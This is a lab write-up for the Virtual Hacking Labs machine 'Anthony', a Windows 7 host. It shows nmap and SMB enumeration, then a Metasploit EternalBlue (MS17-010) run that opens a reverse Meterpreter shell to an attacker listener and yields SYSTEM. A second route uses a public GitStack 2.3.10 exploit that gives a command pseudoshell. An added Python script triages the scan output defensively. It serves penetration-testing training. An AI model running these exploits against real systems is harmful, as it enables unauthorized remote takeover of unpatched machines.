Web · Easy · Windows

VHL — Anthony

Windows 7 SP1 with Apache and multiple services. Enumerated web application vulnerabilities and exploited weak credentials for admin access.

February 12, 2025 · Virtual Hacking Labs
#Apache #Windows 7 #Credential Enum #RCE

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 01:44 EST
Stats: 0:00:46 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 61.54% done; ETC: 01:45 (0:00:20 remaining)
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.11% done; ETC: 01:45 (0:00:00 remaining)
Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.11% done; ETC: 01:45 (0:00:00 remaining)
Nmap scan report for 10.11.1.113
Host is up (0.021s latency).
Not shown: 62563 closed tcp ports (reset), 2959 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.2.22 ((Win32) mod_ssl/2.2.22 OpenSSL/0.9.8u mod_wsgi/3.3 Python/2.7.2 PHP/5.4.3)
|_http-title: Page not found at /
|_http-server-header: Apache/2.2.22 (Win32) mod_ssl/2.2.22 OpenSSL/0.9.8u mod_wsgi/3.3 Python/2.7.2 PHP/5.4.3
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
2869/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp  open  tcpwrapped
|_ssl-date: 2025-02-12T06:46:33+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: ANTHONY-PC
|   NetBIOS_Domain_Name: ANTHONY-PC
|   NetBIOS_Computer_Name: ANTHONY-PC
|   DNS_Domain_Name: Anthony-PC
|   DNS_Computer_Name: Anthony-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2025-02-12T06:45:29+00:00
| ssl-cert: Subject: commonName=Anthony-PC
| Not valid before: 2025-02-11T06:44:00
|_Not valid after:  2025-08-13T06:44:00
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
10243/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/12%OT=80%CT=1%CU=43426%PV=Y%DS=2%DC=I%G=Y%TM=67AC
OS:43D0%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=I%TS=7)OPS(O1=M5B
OS:4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8ST11%O5=M5B4NW8ST11%O6
OS:=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF
OS:=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%
OS:Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6
OS:(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=N)
 
Network Distance: 2 hops
Service Info: Host: ANTHONY-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-02-12T06:45:28
|_  start_date: 2025-02-12T05:43:58
|_nbstat: NetBIOS name: ANTHONY-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ac:36:ed (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Anthony-PC
|   NetBIOS computer name: ANTHONY-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-02-11T22:45:29-08:00
|_clock-skew: mean: 1h36m00s, deviation: 3h34m40s, median: 0s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
 
TRACEROUTE
HOP RTT      ADDRESS
1   21.46 ms 10.11.1.113
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 158.86 seconds
```
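As an added defender-side example (not part of the original writeup), a small Python triage script that turns the scan lines above into the findings a reviewer would act on: an end-of-life Apache 2.2 stack on tcp/80, SMB exposed on an end-of-life Windows 7 host (the MS17-010 candidate), SMB signing disabled or not required, and RDP reachable from the scanner. The sample input is constructed from the nmap output above.

```python
import re

# Constructed sample: a handful of lines trimmed from the scan above.
SAMPLE_NMAP = """\
80/tcp    open  http         Apache httpd 2.2.22 ((Win32) mod_ssl/2.2.22 OpenSSL/0.9.8u mod_wsgi/3.3 Python/2.7.2 PHP/5.4.3)
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
| smb-security-mode: 
|   account_used: <blank>
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
"""

# Matches the "PORT STATE SERVICE VERSION" rows of nmap's normal output.
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return {port: (service, version_string)} for each open TCP port row."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports[int(m.group(1))] = (m.group(2), m.group(3).strip())
    return ports


def triage(text):
    """Map raw nmap output to a list of (severity, finding) tuples."""
    findings = []
    ports = parse_ports(text)
    web_banner = ports.get(80, ("", ""))[1]
    m = re.search(r"Apache httpd (\d+)\.(\d+)\.(\d+)", web_banner)
    if m and tuple(map(int, m.groups())) < (2, 4, 0):
        # The 2.2 branch is end-of-life; the bundled OpenSSL/PHP are equally old.
        findings.append(("high", f"EOL Apache {'.'.join(m.groups())} on tcp/80"))
    if 445 in ports and "Windows 7" in ports[445][1]:
        findings.append(("high", "SMB exposed on an EOL Windows 7 host (MS17-010 candidate)"))
    if re.search(r"message_signing: disabled", text):
        findings.append(("medium", "SMB1 message signing disabled"))
    if "Message signing enabled but not required" in text:
        findings.append(("medium", "SMB2 message signing not required"))
    if 3389 in ports:
        findings.append(("low", "RDP reachable from scanner"))
    return findings


if __name__ == "__main__":
    for severity, finding in triage(SAMPLE_NMAP):
        print(f"[{severity}] {finding}")
```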
 

80

```sh
80/tcp    open  http         Apache httpd 2.2.22 ((Win32) mod_ssl/2.2.22 OpenSSL/0.9.8u mod_wsgi/3.3 Python/2.7.2 PHP/5.4.3)
|_http-title: Page not found at /
|_http-server-header: Apache/2.2.22 (Win32) mod_ssl/2.2.22 OpenSSL/0.9.8u mod_wsgi/3.3 Python/2.7.2 PHP/5.4.3
```

445

```sh
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```

```sh
smbclient -N -L \\\\10.11.1.113
Anonymous login successful
 
	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.11.1.113 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

EternalBlue (ms17_010)

```sh
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.11.1.113
rhosts => 10.11.1.113
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.16.1.1
lhost => 172.16.1.1
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
```

```sh
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
 
[*] Started reverse TCP handler on 172.16.1.1:4444 
[*] 10.11.1.113:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.11.1.113:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.11.1.113:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.11.1.113:445 - The target is vulnerable.
[*] 10.11.1.113:445 - Connecting to target for exploitation.
[+] 10.11.1.113:445 - Connection established for exploitation.
[+] 10.11.1.113:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.11.1.113:445 - CORE raw buffer dump (42 bytes)
[*] 10.11.1.113:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.11.1.113:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.11.1.113:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.11.1.113:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.11.1.113:445 - Trying exploit with 12 Groom Allocations.
[*] 10.11.1.113:445 - Sending all but last fragment of exploit packet
[*] Sending stage (203846 bytes) to 10.11.1.113
[*] Meterpreter session 1 opened (172.16.1.1:4444 -> 10.11.1.113:49425) at 2025-02-12 10:09:30 -0500
[-] 10.11.1.113:445 - RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationError
 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32>whoami
whoami
nt authority\system
 
C:\Windows\system32>type C:\users\administrator\desktop\key.txt
type C:\users\administrator\desktop\key.txt
uq0c8n6id4aaj8ivr67e
C:\Windows\system32>date
date
The current date is: Wed 02/12/2025 
```

Without Metasploit

Browse to /gitstack (the GitStack web panel) and create a repository:

  • create a user
  • grant the newly created user permissions on the repository

GitStack 2.3.10

  • https://github.com/TBernard97/Gitstack-2.3.10-Exploit-Refactor

```sh
python3 exploit_refactored.py -U test -P test -r test 10.11.1.113 
[+] Connected to http://10.11.1.113:80/ successfully.
[*] Creating users on http://10.11.1.113:80/.
[*] Found user test
[*] Web repository already created
[*] Getting repository list
[*] Found repo: test
[*] Adding user test to repository
[*] Disabling everyone user access to repository
b'Your GitStack credentials were not entered correcly. Please ask your GitStack administrator to give you a username/password and give you access to this repository. <br />Note : You have to enter the credentials of a user which has at least read access to your repository. Your GitStack administration panel username/password will not work. '
 
[+] The target is vulnerable and a pseudoshell has been obtained.
Type commands to have them executed on the target.
[*] Type 'exit' to exit.
 
> whoami
"nt authority\system
" 
 
> type C:\users\administrator\desktop\key.txt
"uq0c8n6id4aaj8ivr67e" 
 
> date
"The current date is: Wed 02/12/2025 
Enter the new date: (mm-dd-yy) "
```